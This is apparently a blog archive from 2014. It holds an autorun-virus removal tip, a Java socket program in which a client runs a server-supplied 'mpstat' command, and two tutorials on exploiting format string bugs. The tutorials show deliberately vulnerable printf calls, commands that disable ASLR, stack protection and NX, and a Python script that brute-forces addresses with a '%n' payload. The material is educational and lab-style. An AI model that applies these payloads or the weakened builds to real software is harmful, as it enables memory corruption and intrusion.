Thursday 29 May 2014

Removing autorun virus from Windows machines

The autorun virus prevents drives on Windows machines from being opened by double-clicking their icons. Here is a simple way to remove the virus.

Start > Run > cmd

Type the following commands :

> cd\
> attrib -r -h -s autorun.inf
> del autorun.inf

To go to the next partition (e.g. drive D):
> d:

Repeat the steps above.

Restart the system. Done !!

Finding CPU load : Client-server architecture

Task :
Design a distributed application using sockets. The application consists of a server which requests the CPU load from n clients and finds the maximum and minimum loaded systems.

To find the CPU load of a single local machine, see this previous post.


Server.java :


import java.io.*;
import java.net.*;

public class Server extends Thread
{
   private ServerSocket serverSocket;
  
   public Server(int port) throws IOException
   {
      serverSocket = new ServerSocket(port);
      serverSocket.setSoTimeout(30000);
   }

   public void run()
   {
     int p1=0,p2=0;
     float max,min;
     int j=0,i;
     float a[]=new float [10];
     String clients[]=new String [10];
      while(j < a.length)   // stop once the 10-slot arrays are full
      {
         try
         {
           clients[j]="";
           String cmd="";
           float y;
            System.out.println("Port ready to connect: " + serverSocket.getLocalPort());
            Socket server = serverSocket.accept();
            System.out.println("Connected");
            DataInputStream in = new DataInputStream(server.getInputStream());
            DataOutputStream out = new DataOutputStream(server.getOutputStream());
            out.writeUTF("mpstat");
            cmd=in.readUTF();
            y=Float.parseFloat(cmd);
            y=100-y;
            clients[j]=""+server.getRemoteSocketAddress();
            a[j]=y;
            j++;
            System.out.println("CPU load:"+y);
            server.close();
         }catch(SocketTimeoutException s)
         {
            System.out.println("Socket timed out!");
            break;
         }catch(IOException e)
         {
            System.out.println(e);
            break;
         }
      }
        max=a[0];
        min=a[0];
        // scan only the j entries that were actually filled in
        for(i=1; i<j; i++)
        {
          if(max < a[i]){
            max=a[i];
            p1=i;
          }
          else if(min > a[i]){
            min=a[i];
            p2=i;
          }
        }

        System.out.println();
        System.out.println("\nMax Load: "+max+" from "+clients[p1]);
        System.out.println("Min Load: "+min+" from "+clients[p2]);
   }
   public static void main(String [] args)
   {
      int port = 5555;
      try
      {
         Thread t = new Server(port);
         t.start();
      }catch(IOException e)
      {
         e.printStackTrace();
      }
   }
}



Client.java :

import java.io.*;
import java.net.*;

public class Client
{
   public static void main(String [] args)
   {
      String serverName = "server_ip";
      int port = 5555;
      try
      {
         System.out.println("Connecting to " + serverName + " on port " + port);
         Socket client = new Socket(serverName, port);
         System.out.println("connected");
         OutputStream outToServer = client.getOutputStream();
         DataOutputStream out = new DataOutputStream(outToServer);
         InputStream inFromServer = client.getInputStream();
         DataInputStream in = new DataInputStream(inFromServer);
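         String x=in.readUTF();
         // The command string arrives over the network: run it only if it is
         // the one command this protocol expects, never an arbitrary string.
         if(!"mpstat".equals(x))
           throw new IOException("unexpected command from server: " + x);
         Process p=Runtime.getRuntime().exec(x);
         BufferedReader inbuf=new BufferedReader(new InputStreamReader(p.getInputStream()));
         String l=null;
         int i=1;
         String y="";
         // the 4th line of the mpstat output is expected to be the "all" CPU row
         while((l=inbuf.readLine()) != null && i < 4)
           i++;
         if(l == null)
           throw new IOException("mpstat output shorter than expected");
         if(i>1)
           System.out.println("Action completed");
         // the last 5 characters of that row are the %idle value
         for(i=Math.max(0, l.length()-5); i < l.length(); i++)
           y=y+l.charAt(i);
         out.writeUTF(y);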
         client.close();
      }catch(IOException e)
      {
         e.printStackTrace();
      }
   }
}






Thursday 22 May 2014

Exploiting format string vulnerability - Part 3

This time we will add some more fun to format string exploitation. Newcomers, please go through part 1 and part 2 first for a better understanding of the basics of format string exploitation.

Task :
Set the value of target to 0xbeefbeef

Program :
// to be compiled as `gcc -o 3 3.c -m32`
#include <stdio.h>
#include <string.h>

int target = 0;

int main(int argc, char **argv)
{
    char buf[100];

    strncpy(buf, argv[1], 100);
    printf(buf);    // vulnerable on purpose: user input is used as the format string
    if ( target == 0xbeefbeef )
        printf("Pat yourself on the back for me, wont you?\n");
    else
        printf("\nYikes, the value of target=%08x\n", target);
    return 0;
}


Disabling all countermeasures against buffer overflow attacks and format string exploitation :

Disabling address randomization using the following command:
# sysctl -w kernel.randomize_va_space=0
Disabling stack guard
# gcc -fno-stack-protector -o example example.c
Disabling NX protection
# gcc -z execstack -fno-stack-protector -o example example.c

To get the output we need to change the content of the global variable 'target'. The program never changes its value anywhere, so the comparison always evaluates to false.
Our task is to find the address of the variable 'target' and overwrite its content with 'beefbeef'.
By exploiting the format string vulnerability of 'printf', we can output the contents of address locations in memory.
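
The defensive counterpart of the program above, as an added example that is not code from the original post: the untrusted argument is passed as data to a constant "%s" format, and a small scanner flags conversion directives in input before it reaches a printf-family call. The names `echo_untrusted` and `count_directives` and the sample string are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Hardened echo: the untrusted string is an argument to a constant "%s"
 * format, so "%x" or "%n" inside it is copied out, never interpreted.
 * Returns the length written, or -1 on bad arguments. */
int echo_untrusted(const char *input, char *out, size_t outsz)
{
    if (input == NULL || out == NULL || outsz == 0)
        return -1;
    return snprintf(out, outsz, "%s", input);
}

/* Count conversion directives in an untrusted string. "%%" is a literal
 * percent sign and is skipped. *writes receives the number of %n
 * directives, the ones that store to memory. */
int count_directives(const char *s, int *writes)
{
    int total = 0;
    *writes = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        s++;
        if (*s == '%')
            continue;
        /* skip flags, width, precision, "N$" position, length modifiers */
        while (*s && strchr("0123456789$#-+ '.*hlqjzLt", *s))
            s++;
        if (*s == '\0')
            break;
        total++;
        if (*s == 'n')
            (*writes)++;
    }
    return total;
}

int main(void)
{
    const char *sample = "AAAA%08x.%08x.%5$n";   /* constructed input */
    char out[64];
    int writes;
    int n = count_directives(sample, &writes);
    echo_untrusted(sample, out, sizeof out);
    printf("%s\n%d directives, %d memory-writing\n", out, n, writes);
    return 0;
}
```

Building with gcc's `-Wformat -Wformat-security` makes the compiler warn about calls such as `printf(buf)`.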



We input some characters (AAAA here) and output the contents of memory. Look for the value 41414141, which corresponds to AAAA. Thus we now know an address location and we can overwrite the content there.

Using gdb we can find out the address of 'target', and we will put that address in the position of AAAA. So the content at this particular address will be overwritten with 48879 (beef). We need to overwrite the adjacent address also (since we need beefbeef).
address : 0x804a024

I am writing 48864 instead of 48879. Why? This is left for the reader to find out.
(hint : I have already written some characters, so the count of those characters should be subtracted. Understand properly what printf is actually doing.)

output :


Exploiting format string vulnerability- Part 2

In my previous post about the format string vulnerability, I explained how to use a global variable to alter the program's control flow. This is a continuation. Here, we will see the same example code once again, but with the variable 'flag' as a local variable. (To understand the difference, please read the previous post.)

Task :
Give input such that “You entered right parameter” is printed out.

Program :

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char password[255];
    int flag;

    flag = 0;
    strncpy(password, argv[1], 255);
    printf("\nEntered password is : ");
    printf(password);    // vulnerable on purpose: user input is used as the format string
    printf("\n");
    if(flag)
    {
        printf("You entered right parameter\n");
    }
    else
    {
        printf("wrong input\n");
    }
    return 0;
}

....................................

The flag is not a global variable here. It is a local variable in the main function, which means it is kept on the stack.
Get the address of 'flag' using gdb. As we did in the previous exploitation, we can overwrite the content of the address where the value of flag is stored. But since it is on the stack, the address may be slightly different when we run the program outside gdb. So we need to test all the addresses around the address we got from the gdb inspection. We need to write a script that does this task.

(python script)

import struct
from subprocess import call

for i in range(0, 100):
    x = 0xffffd301 + i
    print(hex(x))
    # pack the candidate address as a 32-bit little-endian value
    y = struct.pack("<I", x)
    print(y)
    call([b"./2", b"AAA" + y + b"%8$n"])

The address obtained from gdb is 0xffffd2ec





The script prints the addresses around this address and tries to overwrite each of them (if no correct result is obtained, replace the address in the for loop with the last address checked so far and keep running the loop until we get the correct output).

Exit gdb and try outside of gdb.